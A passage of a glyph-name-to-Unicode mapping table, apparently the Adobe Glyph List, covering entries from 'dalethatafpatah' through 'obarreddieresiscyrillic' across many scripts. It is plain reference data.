dalethatafpatah;05D3 05B2
dalethatafpatahhebrew;05D3 05B2
dalethatafsegol;05D3 05B1
dalethatafsegolhebrew;05D3 05B1
dalethebrew;05D3
dalethiriq;05D3 05B4
dalethiriqhebrew;05D3 05B4
daletholam;05D3 05B9
daletholamhebrew;05D3 05B9
daletpatah;05D3 05B7
daletpatahhebrew;05D3 05B7
daletqamats;05D3 05B8
daletqamatshebrew;05D3 05B8
daletqubuts;05D3 05BB
daletqubutshebrew;05D3 05BB
daletsegol;05D3 05B6
daletsegolhebrew;05D3 05B6
daletsheva;05D3 05B0
daletshevahebrew;05D3 05B0
dalettsere;05D3 05B5
dalettserehebrew;05D3 05B5
dalfinalarabic;FEAA
dammaarabic;064F
dammalowarabic;064F
dammatanaltonearabic;064C
dammatanarabic;064C
danda;0964
dargahebrew;05A7
dargalefthebrew;05A7
dasiapneumatacyrilliccmb;0485
dblGrave;F6D3
dblanglebracketleft;300A
dblanglebracketleftvertical;FE3D
dblanglebracketright;300B
dblanglebracketrightvertical;FE3E
dblarchinvertedbelowcmb;032B
dblarrowleft;21D4
dblarrowright;21D2
dbldanda;0965
dblgrave;F6D6
dblgravecmb;030F
dblintegral;222C
dbllowline;2017
dbllowlinecmb;0333
dbloverlinecmb;033F
dblprimemod;02BA
dblverticalbar;2016
dblverticallineabovecmb;030E
dbopomofo;3109
dbsquare;33C8
dcaron;010F
dcedilla;1E11
dcircle;24D3
dcircumflexbelow;1E13
dcroat;0111
ddabengali;09A1
ddadeva;0921
ddagujarati;0AA1
ddagurmukhi;0A21
ddalarabic;0688
ddalfinalarabic;FB89
dddhadeva;095C
ddhabengali;09A2
ddhadeva;0922
ddhagujarati;0AA2
ddhagurmukhi;0A22
ddotaccent;1E0B
ddotbelow;1E0D
decimalseparatorarabic;066B
decimalseparatorpersian;066B
decyrillic;0434
degree;00B0
dehihebrew;05AD
dehiragana;3067
deicoptic;03EF
dekatakana;30C7
deleteleft;232B
deleteright;2326
delta;03B4
deltaturned;018D
denominatorminusonenumeratorbengali;09F8
dezh;02A4
dhabengali;09A7
dhadeva;0927
dhagujarati;0AA7
dhagurmukhi;0A27
dhook;0257
dialytikatonos;0385
dialytikatonoscmb;0344
diamond;2666
diamondsuitwhite;2662
dieresis;00A8
dieresisacute;F6D7
dieresisbelowcmb;0324
dieresiscmb;0308
dieresisgrave;F6D8
dieresistonos;0385
dihiragana;3062
dikatakana;30C2
dittomark;3003
divide;00F7
divides;2223
divisionslash;2215
djecyrillic;0452
dkshade;2593
dlinebelow;1E0F
dlsquare;3397
dmacron;0111
dmonospace;FF44
dnblock;2584
dochadathai;0E0E
dodekthai;0E14
dohiragana;3069
dokatakana;30C9
dollar;0024
dollarinferior;F6E3
dollarmonospace;FF04
dollaroldstyle;F724
dollarsmall;FE69
dollarsuperior;F6E4
dong;20AB
dorusquare;3326
dotaccent;02D9
dotaccentcmb;0307
dotbelowcmb;0323
dotbelowcomb;0323
dotkatakana;30FB
dotlessi;0131
dotlessj;F6BE
dotlessjstrokehook;0284
dotmath;22C5
dottedcircle;25CC
doubleyodpatah;FB1F
doubleyodpatahhebrew;FB1F
downtackbelowcmb;031E
downtackmod;02D5
dparen;249F
dsuperior;F6EB
dtail;0256
dtopbar;018C
duhiragana;3065
dukatakana;30C5
dz;01F3
dzaltone;02A3
dzcaron;01C6
dzcurl;02A5
dzeabkhasiancyrillic;04E1
dzecyrillic;0455
dzhecyrillic;045F
e;0065
eacute;00E9
earth;2641
ebengali;098F
ebopomofo;311C
ebreve;0115
ecandradeva;090D
ecandragujarati;0A8D
ecandravowelsigndeva;0945
ecandravowelsigngujarati;0AC5
ecaron;011B
ecedillabreve;1E1D
echarmenian;0565
echyiwnarmenian;0587
ecircle;24D4
ecircumflex;00EA
ecircumflexacute;1EBF
ecircumflexbelow;1E19
ecircumflexdotbelow;1EC7
ecircumflexgrave;1EC1
ecircumflexhookabove;1EC3
ecircumflextilde;1EC5
ecyrillic;0454
edblgrave;0205
edeva;090F
edieresis;00EB
edot;0117
edotaccent;0117
edotbelow;1EB9
eegurmukhi;0A0F
eematragurmukhi;0A47
efcyrillic;0444
egrave;00E8
egujarati;0A8F
eharmenian;0567
ehbopomofo;311D
ehiragana;3048
ehookabove;1EBB
eibopomofo;311F
eight;0038
eightarabic;0668
eightbengali;09EE
eightcircle;2467
eightcircleinversesansserif;2791
eightdeva;096E
eighteencircle;2471
eighteenparen;2485
eighteenperiod;2499
eightgujarati;0AEE
eightgurmukhi;0A6E
eighthackarabic;0668
eighthangzhou;3028
eighthnotebeamed;266B
eightideographicparen;3227
eightinferior;2088
eightmonospace;FF18
eightoldstyle;F738
eightparen;247B
eightperiod;248F
eightpersian;06F8
eightroman;2177
eightsuperior;2078
eightthai;0E58
einvertedbreve;0207
eiotifiedcyrillic;0465
ekatakana;30A8
ekatakanahalfwidth;FF74
ekonkargurmukhi;0A74
ekorean;3154
elcyrillic;043B
element;2208
elevencircle;246A
elevenparen;247E
elevenperiod;2492
elevenroman;217A
ellipsis;2026
ellipsisvertical;22EE
emacron;0113
emacronacute;1E17
emacrongrave;1E15
emcyrillic;043C
emdash;2014
emdashvertical;FE31
emonospace;FF45
emphasismarkarmenian;055B
emptyset;2205
enbopomofo;3123
encyrillic;043D
endash;2013
endashvertical;FE32
endescendercyrillic;04A3
eng;014B
engbopomofo;3125
enghecyrillic;04A5
enhookcyrillic;04C8
enspace;2002
eogonek;0119
eokorean;3153
eopen;025B
eopenclosed;029A
eopenreversed;025C
eopenreversedclosed;025E
eopenreversedhook;025D
eparen;24A0
epsilon;03B5
epsilontonos;03AD
equal;003D
equalmonospace;FF1D
equalsmall;FE66
equalsuperior;207C
equivalence;2261
erbopomofo;3126
ercyrillic;0440
ereversed;0258
ereversedcyrillic;044D
escyrillic;0441
esdescendercyrillic;04AB
esh;0283
eshcurl;0286
eshortdeva;090E
eshortvowelsigndeva;0946
eshreversedloop;01AA
eshsquatreversed;0285
esmallhiragana;3047
esmallkatakana;30A7
esmallkatakanahalfwidth;FF6A
estimated;212E
esuperior;F6EC
eta;03B7
etarmenian;0568
etatonos;03AE
eth;00F0
etilde;1EBD
etildebelow;1E1B
etnahtafoukhhebrew;0591
etnahtafoukhlefthebrew;0591
etnahtahebrew;0591
etnahtalefthebrew;0591
eturned;01DD
eukorean;3161
euro;20AC
evowelsignbengali;09C7
evowelsigndeva;0947
evowelsigngujarati;0AC7
exclam;0021
exclamarmenian;055C
exclamdbl;203C
exclamdown;00A1
exclamdownsmall;F7A1
exclammonospace;FF01
exclamsmall;F721
existential;2203
ezh;0292
ezhcaron;01EF
ezhcurl;0293
ezhreversed;01B9
ezhtail;01BA
f;0066
fadeva;095E
fagurmukhi;0A5E
fahrenheit;2109
fathaarabic;064E
fathalowarabic;064E
fathatanarabic;064B
fbopomofo;3108
fcircle;24D5
fdotaccent;1E1F
feharabic;0641
feharmenian;0586
fehfinalarabic;FED2
fehinitialarabic;FED3
fehmedialarabic;FED4
feicoptic;03E5
female;2640
ff;FB00
ffi;FB03
ffl;FB04
fi;FB01
fifteencircle;246E
fifteenparen;2482
fifteenperiod;2496
figuredash;2012
filledbox;25A0
filledrect;25AC
finalkaf;05DA
finalkafdagesh;FB3A
finalkafdageshhebrew;FB3A
finalkafhebrew;05DA
finalkafqamats;05DA 05B8
finalkafqamatshebrew;05DA 05B8
finalkafsheva;05DA 05B0
finalkafshevahebrew;05DA 05B0
finalmem;05DD
finalmemhebrew;05DD
finalnun;05DF
finalnunhebrew;05DF
finalpe;05E3
finalpehebrew;05E3
finaltsadi;05E5
finaltsadihebrew;05E5
firsttonechinese;02C9
fisheye;25C9
fitacyrillic;0473
five;0035
fivearabic;0665
fivebengali;09EB
fivecircle;2464
fivecircleinversesansserif;278E
fivedeva;096B
fiveeighths;215D
fivegujarati;0AEB
fivegurmukhi;0A6B
fivehackarabic;0665
fivehangzhou;3025
fiveideographicparen;3224
fiveinferior;2085
fivemonospace;FF15
fiveoldstyle;F735
fiveparen;2478
fiveperiod;248C
fivepersian;06F5
fiveroman;2174
fivesuperior;2075
fivethai;0E55
fl;FB02
florin;0192
fmonospace;FF46
fmsquare;3399
fofanthai;0E1F
fofathai;0E1D
fongmanthai;0E4F
forall;2200
four;0034
fourarabic;0664
fourbengali;09EA
fourcircle;2463
fourcircleinversesansserif;278D
fourdeva;096A
fourgujarati;0AEA
fourgurmukhi;0A6A
fourhackarabic;0664
fourhangzhou;3024
fourideographicparen;3223
fourinferior;2084
fourmonospace;FF14
fournumeratorbengali;09F7
fouroldstyle;F734
fourparen;2477
fourperiod;248B
fourpersian;06F4
fourroman;2173
foursuperior;2074
fourteencircle;246D
fourteenparen;2481
fourteenperiod;2495
fourthai;0E54
fourthtonechinese;02CB
fparen;24A1
fraction;2044
franc;20A3
g;0067
gabengali;0997
gacute;01F5
gadeva;0917
gafarabic;06AF
gaffinalarabic;FB93
gafinitialarabic;FB94
gafmedialarabic;FB95
gagujarati;0A97
gagurmukhi;0A17
gahiragana;304C
gakatakana;30AC
gamma;03B3
gammalatinsmall;0263
gammasuperior;02E0
gangiacoptic;03EB
gbopomofo;310D
gbreve;011F
gcaron;01E7
gcedilla;0123
gcircle;24D6
gcircumflex;011D
gcommaaccent;0123
gdot;0121
gdotaccent;0121
gecyrillic;0433
gehiragana;3052
gekatakana;30B2
geometricallyequal;2251
gereshaccenthebrew;059C
gereshhebrew;05F3
gereshmuqdamhebrew;059D
germandbls;00DF
gershayimaccenthebrew;059E
gershayimhebrew;05F4
getamark;3013
ghabengali;0998
ghadarmenian;0572
ghadeva;0918
ghagujarati;0A98
ghagurmukhi;0A18
ghainarabic;063A
ghainfinalarabic;FECE
ghaininitialarabic;FECF
ghainmedialarabic;FED0
ghemiddlehookcyrillic;0495
ghestrokecyrillic;0493
gheupturncyrillic;0491
ghhadeva;095A
ghhagurmukhi;0A5A
ghook;0260
ghzsquare;3393
gihiragana;304E
gikatakana;30AE
gimarmenian;0563
gimel;05D2
gimeldagesh;FB32
gimeldageshhebrew;FB32
gimelhebrew;05D2
gjecyrillic;0453
glottalinvertedstroke;01BE
glottalstop;0294
glottalstopinverted;0296
glottalstopmod;02C0
glottalstopreversed;0295
glottalstopreversedmod;02C1
glottalstopreversedsuperior;02E4
glottalstopstroke;02A1
glottalstopstrokereversed;02A2
gmacron;1E21
gmonospace;FF47
gohiragana;3054
gokatakana;30B4
gparen;24A2
gpasquare;33AC
gradient;2207
grave;0060
gravebelowcmb;0316
gravecmb;0300
gravecomb;0300
gravedeva;0953
gravelowmod;02CE
gravemonospace;FF40
gravetonecmb;0340
greater;003E
greaterequal;2265
greaterequalorless;22DB
greatermonospace;FF1E
greaterorequivalent;2273
greaterorless;2277
greateroverequal;2267
greatersmall;FE65
gscript;0261
gstroke;01E5
guhiragana;3050
guillemotleft;00AB
guillemotright;00BB
guilsinglleft;2039
guilsinglright;203A
gukatakana;30B0
guramusquare;3318
gysquare;33C9
h;0068
haabkhasiancyrillic;04A9
haaltonearabic;06C1
habengali;09B9
hadescendercyrillic;04B3
hadeva;0939
hagujarati;0AB9
hagurmukhi;0A39
haharabic;062D
hahfinalarabic;FEA2
hahinitialarabic;FEA3
hahiragana;306F
hahmedialarabic;FEA4
haitusquare;332A
hakatakana;30CF
hakatakanahalfwidth;FF8A
halantgurmukhi;0A4D
hamzaarabic;0621
hamzadammaarabic;0621 064F
hamzadammatanarabic;0621 064C
hamzafathaarabic;0621 064E
hamzafathatanarabic;0621 064B
hamzalowarabic;0621
hamzalowkasraarabic;0621 0650
hamzalowkasratanarabic;0621 064D
hamzasukunarabic;0621 0652
hangulfiller;3164
hardsigncyrillic;044A
harpoonleftbarbup;21BC
harpoonrightbarbup;21C0
hasquare;33CA
hatafpatah;05B2
hatafpatah16;05B2
hatafpatah23;05B2
hatafpatah2f;05B2
hatafpatahhebrew;05B2
hatafpatahnarrowhebrew;05B2
hatafpatahquarterhebrew;05B2
hatafpatahwidehebrew;05B2
hatafqamats;05B3
hatafqamats1b;05B3
hatafqamats28;05B3
hatafqamats34;05B3
hatafqamatshebrew;05B3
hatafqamatsnarrowhebrew;05B3
hatafqamatsquarterhebrew;05B3
hatafqamatswidehebrew;05B3
hatafsegol;05B1
hatafsegol17;05B1
hatafsegol24;05B1
hatafsegol30;05B1
hatafsegolhebrew;05B1
hatafsegolnarrowhebrew;05B1
hatafsegolquarterhebrew;05B1
hatafsegolwidehebrew;05B1
hbar;0127
hbopomofo;310F
hbrevebelow;1E2B
hcedilla;1E29
hcircle;24D7
hcircumflex;0125
hdieresis;1E27
hdotaccent;1E23
hdotbelow;1E25
he;05D4
heart;2665
heartsuitblack;2665
heartsuitwhite;2661
hedagesh;FB34
hedageshhebrew;FB34
hehaltonearabic;06C1
heharabic;0647
hehebrew;05D4
hehfinalaltonearabic;FBA7
hehfinalalttwoarabic;FEEA
hehfinalarabic;FEEA
hehhamzaabovefinalarabic;FBA5
hehhamzaaboveisolatedarabic;FBA4
hehinitialaltonearabic;FBA8
hehinitialarabic;FEEB
hehiragana;3078
hehmedialaltonearabic;FBA9
hehmedialarabic;FEEC
heiseierasquare;337B
hekatakana;30D8
hekatakanahalfwidth;FF8D
hekutaarusquare;3336
henghook;0267
herutusquare;3339
het;05D7
hethebrew;05D7
hhook;0266
hhooksuperior;02B1
hieuhacirclekorean;327B
hieuhaparenkorean;321B
hieuhcirclekorean;326D
hieuhkorean;314E
hieuhparenkorean;320D
hihiragana;3072
hikatakana;30D2
hikatakanahalfwidth;FF8B
hiriq;05B4
hiriq14;05B4
hiriq21;05B4
hiriq2d;05B4
hiriqhebrew;05B4
hiriqnarrowhebrew;05B4
hiriqquarterhebrew;05B4
hiriqwidehebrew;05B4
hlinebelow;1E96
hmonospace;FF48
hoarmenian;0570
hohipthai;0E2B
hohiragana;307B
hokatakana;30DB
hokatakanahalfwidth;FF8E
holam;05B9
holam19;05B9
holam26;05B9
holam32;05B9
holamhebrew;05B9
holamnarrowhebrew;05B9
holamquarterhebrew;05B9
holamwidehebrew;05B9
honokhukthai;0E2E
hookabovecomb;0309
hookcmb;0309
hookpalatalizedbelowcmb;0321
hookretroflexbelowcmb;0322
hoonsquare;3342
horicoptic;03E9
horizontalbar;2015
horncmb;031B
hotsprings;2668
house;2302
hparen;24A3
hsuperior;02B0
hturned;0265
huhiragana;3075
huiitosquare;3333
hukatakana;30D5
hukatakanahalfwidth;FF8C
hungarumlaut;02DD
hungarumlautcmb;030B
hv;0195
hyphen;002D
hypheninferior;F6E5
hyphenmonospace;FF0D
hyphensmall;FE63
hyphensuperior;F6E6
hyphentwo;2010
i;0069
iacute;00ED
iacyrillic;044F
ibengali;0987
ibopomofo;3127
ibreve;012D
icaron;01D0
icircle;24D8
icircumflex;00EE
icyrillic;0456
idblgrave;0209
ideographearthcircle;328F
ideographfirecircle;328B
ideographicallianceparen;323F
ideographiccallparen;323A
ideographiccentrecircle;32A5
ideographicclose;3006
ideographiccomma;3001
ideographiccommaleft;FF64
ideographiccongratulationparen;3237
ideographiccorrectcircle;32A3
ideographicearthparen;322F
ideographicenterpriseparen;323D
ideographicexcellentcircle;329D
ideographicfestivalparen;3240
ideographicfinancialcircle;3296
ideographicfinancialparen;3236
ideographicfireparen;322B
ideographichaveparen;3232
ideographichighcircle;32A4
ideographiciterationmark;3005
ideographiclaborcircle;3298
ideographiclaborparen;3238
ideographicleftcircle;32A7
ideographiclowcircle;32A6
ideographicmedicinecircle;32A9
ideographicmetalparen;322E
ideographicmoonparen;322A
ideographicnameparen;3234
ideographicperiod;3002
ideographicprintcircle;329E
ideographicreachparen;3243
ideographicrepresentparen;3239
ideographicresourceparen;323E
ideographicrightcircle;32A8
ideographicsecretcircle;3299
ideographicselfparen;3242
ideographicsocietyparen;3233
ideographicspace;3000
ideographicspecialparen;3235
ideographicstockparen;3231
ideographicstudyparen;323B
ideographicsunparen;3230
ideographicsuperviseparen;323C
ideographicwaterparen;322C
ideographicwoodparen;322D
ideographiczero;3007
ideographmetalcircle;328E
ideographmooncircle;328A
ideographnamecircle;3294
ideographsuncircle;3290
ideographwatercircle;328C
ideographwoodcircle;328D
ideva;0907
idieresis;00EF
idieresisacute;1E2F
idieresiscyrillic;04E5
idotbelow;1ECB
iebrevecyrillic;04D7
iecyrillic;0435
ieungacirclekorean;3275
ieungaparenkorean;3215
ieungcirclekorean;3267
ieungkorean;3147
ieungparenkorean;3207
igrave;00EC
igujarati;0A87
igurmukhi;0A07
ihiragana;3044
ihookabove;1EC9
iibengali;0988
iicyrillic;0438
iideva;0908
iigujarati;0A88
iigurmukhi;0A08
iimatragurmukhi;0A40
iinvertedbreve;020B
iishortcyrillic;0439
iivowelsignbengali;09C0
iivowelsigndeva;0940
iivowelsigngujarati;0AC0
ij;0133
ikatakana;30A4
ikatakanahalfwidth;FF72
ikorean;3163
ilde;02DC
iluyhebrew;05AC
imacron;012B
imacroncyrillic;04E3
imageorapproximatelyequal;2253
imatragurmukhi;0A3F
imonospace;FF49
increment;2206
infinity;221E
iniarmenian;056B
integral;222B
integralbottom;2321
integralbt;2321
integralex;F8F5
integraltop;2320
integraltp;2320
intersection;2229
intisquare;3305
invbullet;25D8
invcircle;25D9
invsmileface;263B
iocyrillic;0451
iogonek;012F
iota;03B9
iotadieresis;03CA
iotadieresistonos;0390
iotalatin;0269
iotatonos;03AF
iparen;24A4
irigurmukhi;0A72
ismallhiragana;3043
ismallkatakana;30A3
ismallkatakanahalfwidth;FF68
issharbengali;09FA
istroke;0268
isuperior;F6ED
iterationhiragana;309D
iterationkatakana;30FD
itilde;0129
itildebelow;1E2D
iubopomofo;3129
iucyrillic;044E
ivowelsignbengali;09BF
ivowelsigndeva;093F
ivowelsigngujarati;0ABF
izhitsacyrillic;0475
izhitsadblgravecyrillic;0477
j;006A
jaarmenian;0571
jabengali;099C
jadeva;091C
jagujarati;0A9C
jagurmukhi;0A1C
jbopomofo;3110
jcaron;01F0
jcircle;24D9
jcircumflex;0135
jcrossedtail;029D
jdotlessstroke;025F
jecyrillic;0458
jeemarabic;062C
jeemfinalarabic;FE9E
jeeminitialarabic;FE9F
jeemmedialarabic;FEA0
jeharabic;0698
jehfinalarabic;FB8B
jhabengali;099D
jhadeva;091D
jhagujarati;0A9D
jhagurmukhi;0A1D
jheharmenian;057B
jis;3004
jmonospace;FF4A
jparen;24A5
jsuperior;02B2
k;006B
kabashkircyrillic;04A1
kabengali;0995
kacute;1E31
kacyrillic;043A
kadescendercyrillic;049B
kadeva;0915
kaf;05DB
kafarabic;0643
kafdagesh;FB3B
kafdageshhebrew;FB3B
kaffinalarabic;FEDA
kafhebrew;05DB
kafinitialarabic;FEDB
kafmedialarabic;FEDC
kafrafehebrew;FB4D
kagujarati;0A95
kagurmukhi;0A15
kahiragana;304B
kahookcyrillic;04C4
kakatakana;30AB
kakatakanahalfwidth;FF76
kappa;03BA
kappasymbolgreek;03F0
kapyeounmieumkorean;3171
kapyeounphieuphkorean;3184
kapyeounpieupkorean;3178
kapyeounssangpieupkorean;3179
karoriisquare;330D
kashidaautoarabic;0640
kashidaautonosidebearingarabic;0640
kasmallkatakana;30F5
kasquare;3384
kasraarabic;0650
kasratanarabic;064D
kastrokecyrillic;049F
katahiraprolongmarkhalfwidth;FF70
kaverticalstrokecyrillic;049D
kbopomofo;310E
kcalsquare;3389
kcaron;01E9
kcedilla;0137
kcircle;24DA
kcommaaccent;0137
kdotbelow;1E33
keharmenian;0584
kehiragana;3051
kekatakana;30B1
kekatakanahalfwidth;FF79
kenarmenian;056F
kesmallkatakana;30F6
kgreenlandic;0138
khabengali;0996
khacyrillic;0445
khadeva;0916
khagujarati;0A96
khagurmukhi;0A16
khaharabic;062E
khahfinalarabic;FEA6
khahinitialarabic;FEA7
khahmedialarabic;FEA8
kheicoptic;03E7
khhadeva;0959
khhagurmukhi;0A59
khieukhacirclekorean;3278
khieukhaparenkorean;3218
khieukhcirclekorean;326A
khieukhkorean;314B
khieukhparenkorean;320A
khokhaithai;0E02
khokhonthai;0E05
khokhuatthai;0E03
khokhwaithai;0E04
khomutthai;0E5B
khook;0199
khorakhangthai;0E06
khzsquare;3391
kihiragana;304D
kikatakana;30AD
kikatakanahalfwidth;FF77
kiroguramusquare;3315
kiromeetorusquare;3316
kirosquare;3314
kiyeokacirclekorean;326E
kiyeokaparenkorean;320E
kiyeokcirclekorean;3260
kiyeokkorean;3131
kiyeokparenkorean;3200
kiyeoksioskorean;3133
kjecyrillic;045C
klinebelow;1E35
klsquare;3398
kmcubedsquare;33A6
kmonospace;FF4B
kmsquaredsquare;33A2
kohiragana;3053
kohmsquare;33C0
kokaithai;0E01
kokatakana;30B3
kokatakanahalfwidth;FF7A
kooposquare;331E
koppacyrillic;0481
koreanstandardsymbol;327F
koroniscmb;0343
kparen;24A6
kpasquare;33AA
ksicyrillic;046F
ktsquare;33CF
kturned;029E
kuhiragana;304F
kukatakana;30AF
kukatakanahalfwidth;FF78
kvsquare;33B8
kwsquare;33BE
l;006C
labengali;09B2
lacute;013A
ladeva;0932
lagujarati;0AB2
lagurmukhi;0A32
lakkhangyaothai;0E45
lamaleffinalarabic;FEFC
lamalefhamzaabovefinalarabic;FEF8
lamalefhamzaaboveisolatedarabic;FEF7
lamalefhamzabelowfinalarabic;FEFA
lamalefhamzabelowisolatedarabic;FEF9
lamalefisolatedarabic;FEFB
lamalefmaddaabovefinalarabic;FEF6
lamalefmaddaaboveisolatedarabic;FEF5
lamarabic;0644
lambda;03BB
lambdastroke;019B
lamed;05DC
lameddagesh;FB3C
lameddageshhebrew;FB3C
lamedhebrew;05DC
lamedholam;05DC 05B9
lamedholamdagesh;05DC 05B9 05BC
lamedholamdageshhebrew;05DC 05B9 05BC
lamedholamhebrew;05DC 05B9
lamfinalarabic;FEDE
lamhahinitialarabic;FCCA
laminitialarabic;FEDF
lamjeeminitialarabic;FCC9
lamkhahinitialarabic;FCCB
lamlamhehisolatedarabic;FDF2
lammedialarabic;FEE0
lammeemhahinitialarabic;FD88
lammeeminitialarabic;FCCC
lammeemjeeminitialarabic;FEDF FEE4 FEA0
lammeemkhahinitialarabic;FEDF FEE4 FEA8
largecircle;25EF
lbar;019A
lbelt;026C
lbopomofo;310C
lcaron;013E
lcedilla;013C
lcircle;24DB
lcircumflexbelow;1E3D
lcommaaccent;013C
ldot;0140
ldotaccent;0140
ldotbelow;1E37
ldotbelowmacron;1E39
leftangleabovecmb;031A
lefttackbelowcmb;0318
less;003C
lessequal;2264
lessequalorgreater;22DA
lessmonospace;FF1C
lessorequivalent;2272
lessorgreater;2276
lessoverequal;2266
lesssmall;FE64
lezh;026E
lfblock;258C
lhookretroflex;026D
lira;20A4
liwnarmenian;056C
lj;01C9
ljecyrillic;0459
ll;F6C0
lladeva;0933
llagujarati;0AB3
llinebelow;1E3B
llladeva;0934
llvocalicbengali;09E1
llvocalicdeva;0961
llvocalicvowelsignbengali;09E3
llvocalicvowelsigndeva;0963
lmiddletilde;026B
lmonospace;FF4C
lmsquare;33D0
lochulathai;0E2C
logicaland;2227
logicalnot;00AC
logicalnotreversed;2310
logicalor;2228
lolingthai;0E25
longs;017F
lowlinecenterline;FE4E
lowlinecmb;0332
lowlinedashed;FE4D
lozenge;25CA
lparen;24A7
lslash;0142
lsquare;2113
lsuperior;F6EE
ltshade;2591
luthai;0E26
lvocalicbengali;098C
lvocalicdeva;090C
lvocalicvowelsignbengali;09E2
lvocalicvowelsigndeva;0962
lxsquare;33D3
m;006D
mabengali;09AE
macron;00AF
macronbelowcmb;0331
macroncmb;0304
macronlowmod;02CD
macronmonospace;FFE3
macute;1E3F
madeva;092E
magujarati;0AAE
magurmukhi;0A2E
mahapakhhebrew;05A4
mahapakhlefthebrew;05A4
mahiragana;307E
maichattawalowleftthai;F895
maichattawalowrightthai;F894
maichattawathai;0E4B
maichattawaupperleftthai;F893
maieklowleftthai;F88C
maieklowrightthai;F88B
maiekthai;0E48
maiekupperleftthai;F88A
maihanakatleftthai;F884
maihanakatthai;0E31
maitaikhuleftthai;F889
maitaikhuthai;0E47
maitholowleftthai;F88F
maitholowrightthai;F88E
maithothai;0E49
maithoupperleftthai;F88D
maitrilowleftthai;F892
maitrilowrightthai;F891
maitrithai;0E4A
maitriupperleftthai;F890
maiyamokthai;0E46
makatakana;30DE
makatakanahalfwidth;FF8F
male;2642
mansyonsquare;3347
maqafhebrew;05BE
mars;2642
masoracirclehebrew;05AF
masquare;3383
mbopomofo;3107
mbsquare;33D4
mcircle;24DC
mcubedsquare;33A5
mdotaccent;1E41
mdotbelow;1E43
meemarabic;0645
meemfinalarabic;FEE2
meeminitialarabic;FEE3
meemmedialarabic;FEE4
meemmeeminitialarabic;FCD1
meemmeemisolatedarabic;FC48
meetorusquare;334D
mehiragana;3081
meizierasquare;337E
mekatakana;30E1
mekatakanahalfwidth;FF92
mem;05DE
memdagesh;FB3E
memdageshhebrew;FB3E
memhebrew;05DE
menarmenian;0574
merkhahebrew;05A5
merkhakefulahebrew;05A6
merkhakefulalefthebrew;05A6
merkhalefthebrew;05A5
mhook;0271
mhzsquare;3392
middledotkatakanahalfwidth;FF65
middot;00B7
mieumacirclekorean;3272
mieumaparenkorean;3212
mieumcirclekorean;3264
mieumkorean;3141
mieumpansioskorean;3170
mieumparenkorean;3204
mieumpieupkorean;316E
mieumsioskorean;316F
mihiragana;307F
mikatakana;30DF
mikatakanahalfwidth;FF90
minus;2212
minusbelowcmb;0320
minuscircle;2296
minusmod;02D7
minusplus;2213
minute;2032
miribaarusquare;334A
mirisquare;3349
mlonglegturned;0270
mlsquare;3396
mmcubedsquare;33A3
mmonospace;FF4D
mmsquaredsquare;339F
mohiragana;3082
mohmsquare;33C1
mokatakana;30E2
mokatakanahalfwidth;FF93
molsquare;33D6
momathai;0E21
moverssquare;33A7
moverssquaredsquare;33A8
mparen;24A8
mpasquare;33AB
mssquare;33B3
msuperior;F6EF
mturned;026F
mu;00B5
mu1;00B5
muasquare;3382
muchgreater;226B
muchless;226A
mufsquare;338C
mugreek;03BC
mugsquare;338D
muhiragana;3080
mukatakana;30E0
mukatakanahalfwidth;FF91
mulsquare;3395
multiply;00D7
mumsquare;339B
munahhebrew;05A3
munahlefthebrew;05A3
musicalnote;266A
musicalnotedbl;266B
musicflatsign;266D
musicsharpsign;266F
mussquare;33B2
muvsquare;33B6
muwsquare;33BC
mvmegasquare;33B9
mvsquare;33B7
mwmegasquare;33BF
mwsquare;33BD
n;006E
nabengali;09A8
nabla;2207
nacute;0144
nadeva;0928
nagujarati;0AA8
nagurmukhi;0A28
nahiragana;306A
nakatakana;30CA
nakatakanahalfwidth;FF85
napostrophe;0149
nasquare;3381
nbopomofo;310B
nbspace;00A0
ncaron;0148
ncedilla;0146
ncircle;24DD
ncircumflexbelow;1E4B
ncommaaccent;0146
ndotaccent;1E45
ndotbelow;1E47
nehiragana;306D
nekatakana;30CD
nekatakanahalfwidth;FF88
newsheqelsign;20AA
nfsquare;338B
ngabengali;0999
ngadeva;0919
ngagujarati;0A99
ngagurmukhi;0A19
ngonguthai;0E07
nhiragana;3093
nhookleft;0272
nhookretroflex;0273
nieunacirclekorean;326F
nieunaparenkorean;320F
nieuncieuckorean;3135
nieuncirclekorean;3261
nieunhieuhkorean;3136
nieunkorean;3134
nieunpansioskorean;3168
nieunparenkorean;3201
nieunsioskorean;3167
nieuntikeutkorean;3166
nihiragana;306B
nikatakana;30CB
nikatakanahalfwidth;FF86
nikhahitleftthai;F899
nikhahitthai;0E4D
nine;0039
ninearabic;0669
ninebengali;09EF
ninecircle;2468
ninecircleinversesansserif;2792
ninedeva;096F
ninegujarati;0AEF
ninegurmukhi;0A6F
ninehackarabic;0669
ninehangzhou;3029
nineideographicparen;3228
nineinferior;2089
ninemonospace;FF19
nineoldstyle;F739
nineparen;247C
nineperiod;2490
ninepersian;06F9
nineroman;2178
ninesuperior;2079
nineteencircle;2472
nineteenparen;2486
nineteenperiod;249A
ninethai;0E59
nj;01CC
njecyrillic;045A
nkatakana;30F3
nkatakanahalfwidth;FF9D
nlegrightlong;019E
nlinebelow;1E49
nmonospace;FF4E
nmsquare;339A
nnabengali;09A3
nnadeva;0923
nnagujarati;0AA3
nnagurmukhi;0A23
nnnadeva;0929
nohiragana;306E
nokatakana;30CE
nokatakanahalfwidth;FF89
nonbreakingspace;00A0
nonenthai;0E13
nonuthai;0E19
noonarabic;0646
noonfinalarabic;FEE6
noonghunnaarabic;06BA
noonghunnafinalarabic;FB9F
noonhehinitialarabic;FEE7 FEEC
nooninitialarabic;FEE7
noonjeeminitialarabic;FCD2
noonjeemisolatedarabic;FC4B
noonmedialarabic;FEE8
noonmeeminitialarabic;FCD5
noonmeemisolatedarabic;FC4E
noonnoonfinalarabic;FC8D
notcontains;220C
notelement;2209
notelementof;2209
notequal;2260
notgreater;226F
notgreaternorequal;2271
notgreaternorless;2279
notidentical;2262
notless;226E
notlessnorequal;2270
notparallel;2226
notprecedes;2280
notsubset;2284
notsucceeds;2281
notsuperset;2285
nowarmenian;0576
nparen;24A9
nssquare;33B1
nsuperior;207F
ntilde;00F1
nu;03BD
nuhiragana;306C
nukatakana;30CC
nukatakanahalfwidth;FF87
nuktabengali;09BC
nuktadeva;093C
nuktagujarati;0ABC
nuktagurmukhi;0A3C
numbersign;0023
numbersignmonospace;FF03
numbersignsmall;FE5F
numeralsigngreek;0374
numeralsignlowergreek;0375
numero;2116
nun;05E0
nundagesh;FB40
nundageshhebrew;FB40
nunhebrew;05E0
nvsquare;33B5
nwsquare;33BB
nyabengali;099E
nyadeva;091E
nyagujarati;0A9E
nyagurmukhi;0A1E
o;006F
oacute;00F3
oangthai;0E2D
obarred;0275
obarredcyrillic;04E9
obarreddieresiscyrillic;04EB
